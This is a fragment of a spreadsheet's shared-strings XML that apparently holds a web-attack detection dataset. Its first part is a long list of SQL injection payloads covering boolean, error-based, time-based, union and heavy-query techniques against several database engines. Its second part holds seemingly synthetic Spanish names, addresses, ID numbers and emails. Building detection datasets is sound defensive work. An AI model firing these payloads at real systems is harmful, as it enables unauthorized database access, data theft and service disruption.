  </si>
  <si>
    <t>-5918' )  as olzc where 5992 = 5992 or 4390 = 9085</t>
  </si>
  <si>
    <t>1'|| ( select 'zyvk' from dual where 2072 = 2072</t>
  </si>
  <si>
    <t>1" )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "dppw" like "dppw</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )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</si>
  <si>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</si>
  <si>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-9011"  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1 where 1096 = 1096 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and "xcjt" = "xcjt</t>
  </si>
  <si>
    <t>select  ( case when  ( 4111 = 1992 )  then 4111 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'uiyj' from dual where 8320 = 8320</t>
  </si>
  <si>
    <t>-7813"  )  )   as yvyl where 5172 = 5172 union all select 5172,5172#</t>
  </si>
  <si>
    <t>1'+ ( select 'sbvh' where 8539 = 8539 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  +'</t>
  </si>
  <si>
    <t>1'+ ( select 'yzxc' where 5230 = 5230  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )    )  )  +'</t>
  </si>
  <si>
    <t>1' or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'rhzy' = 'rhzy</t>
  </si>
  <si>
    <t>1' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'kwhs' like 'kwhs</t>
  </si>
  <si>
    <t>1' )  where 6622 = 6622 order by 1--</t>
  </si>
  <si>
    <t>1" and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "tfok" like "tfok</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'dthp' = 'dthp</t>
  </si>
  <si>
    <t>select  ( case when  ( 3855 = 3855 )  then 3855 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1" )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( "cdnc" like "cdnc</t>
  </si>
  <si>
    <t>1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and 'ytlf' = 'ytlf</t>
  </si>
  <si>
    <t>-7187' or 4159 = 7465</t>
  </si>
  <si>
    <t>1'  )  )   or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' )  as llug where 2244 = 2244 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-2072" )  as rjcz where 2491 = 2491 or 6872 = 6872--</t>
  </si>
  <si>
    <t>-3921' )  as audo where 7087 = 7087 or 1755 = 4937--</t>
  </si>
  <si>
    <t>1'+ ( select 'ljtl' where 1766 = 1766</t>
  </si>
  <si>
    <t>1' )  where 2753 = 2753 and  ( 2739 = 8047 ) *8047--</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  #</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3-- ampw</t>
  </si>
  <si>
    <t>-4670"  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>1"  )  )   as uaxn where 5657 = 5657 rlike  ( select  ( case when  ( 3548 = 7206 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-3596' )  union all select 5349,5349,5349,5349,5349,5349#</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as kahn where 1361 = 1361 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-9854 )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>select  ( case when  ( 2161 = 4328 )  then 2161 else 2161* ( select 2161 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'kojx' from dual where 8140 = 8140 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'nimx' = 'nimx</t>
  </si>
  <si>
    <t>-4785"  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) </t>
  </si>
  <si>
    <t>select case when 1574 = 5523 then 1 else null end--</t>
  </si>
  <si>
    <t>1  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 8814 = 8814</t>
  </si>
  <si>
    <t>select  ( case when  ( 1039 = 5127 )  then 1039 else 1039* ( select 1039 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-7371' )  union all select 4531,4531,4531#</t>
  </si>
  <si>
    <t>-3834'  )  )   as hhiy where 2086 = 2086 or 3038 = 3038</t>
  </si>
  <si>
    <t>1%"  )  )   and 7533 = 7533 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' where 3612 = 3612 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1' )  and  ( 7603 = 3634 ) *3634</t>
  </si>
  <si>
    <t>-7686%" )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'tfqg' from dual where 9862 = 9862 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'bnaz' from dual where 7168 = 7168 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and '%' = '</t>
  </si>
  <si>
    <t>-8665' or 6825 = 7840 and 'vbsy' like 'vbsy</t>
  </si>
  <si>
    <t>1" )  as duvm where 6190 = 6190 order by 1--</t>
  </si>
  <si>
    <t>select  ( case when  ( 1275 = 7674 )  then 1275 else 1275* ( select 1275 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1%' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1' )  where 7629 = 7629 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1" )  where 2136 = 2136 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  'enpn' like 'enpn</t>
  </si>
  <si>
    <t>1"  )  )   as vbpl where 3885 = 3885 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) </t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  "eevk" = "eevk</t>
  </si>
  <si>
    <t>1'+ ( select twyt where 3376 = 3376 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>-3707"  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>-7562 )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>-9087" order by 1#</t>
  </si>
  <si>
    <t>1'  )  )   rlike sleep ( 5 )  and   (  (  'iwct' = 'iwct</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( "vwbx" = "vwbx</t>
  </si>
  <si>
    <t>1" )  where 6671 = 6671 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-9281 )  where 8363 = 8363 or make_set ( 8220 = 5127,5127 ) --</t>
  </si>
  <si>
    <t>1%' )  order by 1--</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1" )  as paai where 4089 = 4089 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-3721' )  union all select 9050,9050--</t>
  </si>
  <si>
    <t>1'  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( 'ejul' = 'ejul</t>
  </si>
  <si>
    <t>1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and 'xmnd' = 'xmnd</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'|| ( select 'gboi' where 4191 = 4191 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t>-5224' )  where 1962 = 1962 union all select 1962,1962,1962,1962,1962,1962,1962,1962,1962--</t>
  </si>
  <si>
    <t>-4984%"  )  )   )  union all select 6980,6980,6980,6980,6980,6980,6980,6980#</t>
  </si>
  <si>
    <t>1 )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1'+ ( select syrz where 7699 = 7699 union all select null,null,null#</t>
  </si>
  <si>
    <t>1 )  where 6784 = 6784 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1"  )  )   as lomw where 9257 = 9257 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-2120' )  or 8734 = 8844#</t>
  </si>
  <si>
    <t>1  )  )   as pzoo where 8036 = 8036 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( "qkkn" like "qkkn</t>
  </si>
  <si>
    <t xml:space="preserve">-3859 )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  ) </t>
  </si>
  <si>
    <t>1"  )  )   as klie where 2840 = 2840 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( 1748 = 1748</t>
  </si>
  <si>
    <t>if ( 8858 = 5680 )  select 8858 else drop function pyuo--</t>
  </si>
  <si>
    <t>1' )  where 4867 = 4867 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1%' )  and elt ( 4249 = 4249,7259 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( 'ztmd' = 'ztmd</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 7889 = 5114,1,1/0 ) </t>
  </si>
  <si>
    <t>-9446  )  )   as wmrq where 3705 = 3705 union all select 3705#</t>
  </si>
  <si>
    <t>1 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) -- loao</t>
  </si>
  <si>
    <t>1' )  as rvch where 1863 = 1863 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) # zcyc</t>
  </si>
  <si>
    <t>-5139  )  )   union all select 3373,3373,3373,3373,3373,3373,3373,3373#</t>
  </si>
  <si>
    <t>1%" )  and 2006 = 2006</t>
  </si>
  <si>
    <t>1'  )  )   as bedq where 8781 = 8781 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>-7319 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>-8153' )  as qhlb where 4948 = 4948 union all select 4948,4948,4948,4948,4948,4948#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  4142 = 4142</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( '%' = '</t>
  </si>
  <si>
    <t>select  ( case when  ( 8993 = 8846 )  then 8993 else 8993* ( select 8993 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1%"  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-2312'  )  )   )  union all select 5282,5282,5282,5282,5282,5282,5282,5282--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  "rqay" like "rqay</t>
  </si>
  <si>
    <t xml:space="preserve">-7535 )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  </t>
  </si>
  <si>
    <t>select case when 6558 = 4327 then 1 else null end--</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( 'njnr' = 'njnr</t>
  </si>
  <si>
    <t>-4605" )  union all select 8542,8542,8542,8542,8542,8542,8542,8542--</t>
  </si>
  <si>
    <t>1  )  )   as potk where 5040 = 5040 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-5742' where 1314 = 1314 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>-7999 )  or 8422 = 1336</t>
  </si>
  <si>
    <t>1 )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 8929 = 8929</t>
  </si>
  <si>
    <t>1" where 6501 = 6501</t>
  </si>
  <si>
    <t>1' )  as oknw where 8777 = 8777</t>
  </si>
  <si>
    <t>1%' and 4595 = 4595#</t>
  </si>
  <si>
    <t>1  )  )   or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'mfib' = 'mfib</t>
  </si>
  <si>
    <t>1" where 2462 = 2462 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' )  as ekjw where 5477 = 5477 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>-7868"  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>1  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>if ( 8284 = 6171 )  select 8284 else drop function mbih--</t>
  </si>
  <si>
    <t>1%'  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' )  as rbpx where 1264 = 1264</t>
  </si>
  <si>
    <t>-1064' or make_set ( 6439 = 2937,2937 )  and 'qojd' = 'qojd</t>
  </si>
  <si>
    <t>1  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>-9508 )  union all select 9950,9950,9950,9950,9950,9950,9950#</t>
  </si>
  <si>
    <t>1" )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( "jozh" = "jozh</t>
  </si>
  <si>
    <t>1" )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( "baia" = "baia</t>
  </si>
  <si>
    <t>1%' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and '%' = '</t>
  </si>
  <si>
    <t>-5021'+ ( select yadq where 4285 = 4285 order by 1#</t>
  </si>
  <si>
    <t>1  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  6406 = 6406</t>
  </si>
  <si>
    <t>1  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 9548 = 9548</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  7240 = 7240</t>
  </si>
  <si>
    <t xml:space="preserve"> ( 1589 = 1589 ) *1</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "pawh" = "pawh</t>
  </si>
  <si>
    <t>1%" or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) #</t>
  </si>
  <si>
    <t>-4291"  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||</t>
  </si>
  <si>
    <t>1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and 'uwep' = 'uwep</t>
  </si>
  <si>
    <t>1'  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'fbsi' like 'fbsi</t>
  </si>
  <si>
    <t>1' )  where 9842 = 9842 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  as ztkr where 1532 = 1532</t>
  </si>
  <si>
    <t>1'|| ( select 'rttq' from dual where 7368 = 7368 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666  )  )  ||'</t>
  </si>
  <si>
    <t>-6400  )  )   union all select 4650,4650,4650--</t>
  </si>
  <si>
    <t>1' and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'gmil' = 'gmil</t>
  </si>
  <si>
    <t>-3794' )  union all select 2485,2485,2485,2485,2485--</t>
  </si>
  <si>
    <t>1 where 5466 = 5466 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>-1212%' )  or make_set ( 7588 = 2306,2306 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>select  ( case when  ( 7978 = 6009 )  then 7978 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1' )  where 6941 = 6941 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>-9534%' or 3038 = 3038</t>
  </si>
  <si>
    <t>1"  )  )   as dnhd where 2657 = 2657 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-4925" union all select 5686,5686,5686,5686,5686,5686,5686#</t>
  </si>
  <si>
    <t>1'|| ( select 'rawn' from dual where 4988 = 4988 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 9443 = 9443 )  then sleep ( 5 )  else 9443* ( select 9443 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" )  and  ( 5452 = 6050 ) *6050 and  ( "ciyc" like "ciyc</t>
  </si>
  <si>
    <t>1%" )  and 8024 = 3560--</t>
  </si>
  <si>
    <t>1" where 4281 = 4281</t>
  </si>
  <si>
    <t>1"  )  )   as vdbf where 7969 = 7969 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1 )  as boed where 6787 = 6787</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  6866 = 6866</t>
  </si>
  <si>
    <t>iocntrl</t>
  </si>
  <si>
    <t>portillo</t>
  </si>
  <si>
    <t>2er7n9um43a</t>
  </si>
  <si>
    <t>cojera</t>
  </si>
  <si>
    <t>c/ barrio de recuesto, 195 6-h</t>
  </si>
  <si>
    <t>avda. fernando ferrerio s/n</t>
  </si>
  <si>
    <t>589ecialid6d</t>
  </si>
  <si>
    <t>79564193v</t>
  </si>
  <si>
    <t>legris@beautifulbody.yu</t>
  </si>
  <si>
    <t>lucena</t>
  </si>
  <si>
    <t>13061311w</t>
  </si>
  <si>
    <t>chmara@novolardiseno.ky</t>
  </si>
  <si>
    <t>calle barrio villayuda 169,</t>
  </si>
  <si>
    <t>arre</t>
  </si>
  <si>
    <t>gaspard-birgel@indorec.kr</t>
  </si>
  <si>
    <t>45025499d</t>
  </si>
  <si>
    <t>mullin@gopersonaltrainers.nr</t>
  </si>
  <si>
    <t>d2s7sp79ro</t>
  </si>
  <si>
    <t>93698052p</t>
  </si>
  <si>
    <t>81717068t</t>
  </si>
  <si>
    <t>robledillo de la jara</t>
  </si>
  <si>
    <t>p5li8e5i2</t>
  </si>
  <si>
    <t>mald</t>
  </si>
  <si>
    <t>norring-fujikawa@autoconstruccion.au</t>
  </si>
  <si>
    <t>rothamel</t>
  </si>
  <si>
    <t>vitacco</t>
  </si>
  <si>
    <t>thuswald</t>
  </si>
  <si>
    <t>beasain</t>
  </si>
  <si>
    <t>octagonal</t>
  </si>
  <si>
    <t>estalell</t>
  </si>
  <si>
    <t>68689912k</t>
  </si>
  <si>
    <t>alfa71ta</t>
  </si>
  <si>
    <t>audadora</t>
  </si>
  <si>
    <t>3o7za732</t>
  </si>
  <si>
    <t>15423399j</t>
  </si>
  <si>
    <t>prdena del rincn</t>
  </si>
  <si>
    <t>pl9t1r4</t>
  </si>
  <si>
    <t>villarejo del valle</t>
  </si>
  <si>
    <t>8e6a74aer</t>
  </si>
  <si>
    <t>calle santa apolonia, 47,</t>
  </si>
  <si>
    <t>carrer mestre albages 61,</t>
  </si>
  <si>
    <t>iruraiz-gauna</t>
  </si>
  <si>
    <t>d308ada</t>
  </si>
  <si>
    <t>kirland-lincovsky@la-sexta-f1.fo</t>
  </si>
  <si>
    <t>bossa</t>
  </si>
  <si>
    <t>cunillera penades</t>
  </si>
  <si>
    <t>calle tajo, 182,</t>
  </si>
  <si>
    <t>c/ jose belso castao, s/n,</t>
  </si>
  <si>
    <t>arrasate 130,</t>
  </si>
  <si>
    <t>kuzz</t>
  </si>
  <si>
    <t>c/ fernandez shaw, 177 1-e</t>
  </si>
  <si>
    <t>olmeda de la cuesta</t>
  </si>
  <si>
    <t>selwart@studentrooms.zr</t>
  </si>
  <si>
    <t>12370442f</t>
  </si>
  <si>
    <t>terland-bartha5@informatica2009.ck</t>
  </si>
  <si>
    <t>63947168s</t>
  </si>
  <si>
    <t>toril, 171 5h</t>
  </si>
  <si>
    <t>dan</t>
  </si>
  <si>
